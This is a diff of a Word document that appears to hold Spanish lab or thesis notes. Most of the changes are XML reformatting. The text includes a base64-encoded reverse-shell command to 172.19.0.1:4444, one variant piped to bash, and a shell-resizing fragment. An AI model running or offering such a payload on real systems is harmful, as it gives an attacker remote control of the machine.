--- a/doc/memoria/apuntesMemoria.docx
+++ b/doc/memoria/apuntesMemoria.docx
@@ -1306,34 +1306,10 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
           <w:u w:val="single"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> He usado </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>service</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1345,38 +1321,49 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>start</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">He </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> service start </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>mariadb</w:t>
@@ -1409,69 +1396,69 @@
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -1636,18 +1623,7 @@
           <w:lang w:val="en-US" w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzQ0NDQgMD4mMQo=" | base64 -d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTkuMC4xLzQ0NDQgMD4mMQo=" | base64 -d </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1687,245 +1663,111 @@
           <w:kern w:val="0"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>"YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xNzIuMTkuMC4xLzQ0NDQgMD4mMQo%3D"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>|</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>base64</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>-d</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>|</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="916"/>
-          <w:tab w:val="left" w:pos="1832"/>
-          <w:tab w:val="left" w:pos="2748"/>
-          <w:tab w:val="left" w:pos="3664"/>
-          <w:tab w:val="left" w:pos="4580"/>
-          <w:tab w:val="left" w:pos="5496"/>
-          <w:tab w:val="left" w:pos="6412"/>
-          <w:tab w:val="left" w:pos="7328"/>
-          <w:tab w:val="left" w:pos="8244"/>
-          <w:tab w:val="left" w:pos="9160"/>
-          <w:tab w:val="left" w:pos="10076"/>
-          <w:tab w:val="left" w:pos="10992"/>
-          <w:tab w:val="left" w:pos="11908"/>
-          <w:tab w:val="left" w:pos="12824"/>
-          <w:tab w:val="left" w:pos="13740"/>
-          <w:tab w:val="left" w:pos="14656"/>
-        </w:tabs>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>echo "YmFzaCAtaSA%2BJiAvZGV2L3RjcC8xNzIuMTkuMC4xLzQ0NDQgMD4mMQo%3D" | base64 -d | bash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
@@ -2114,6 +1956,672 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t xml:space="preserve"> rows 44 columns 184</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
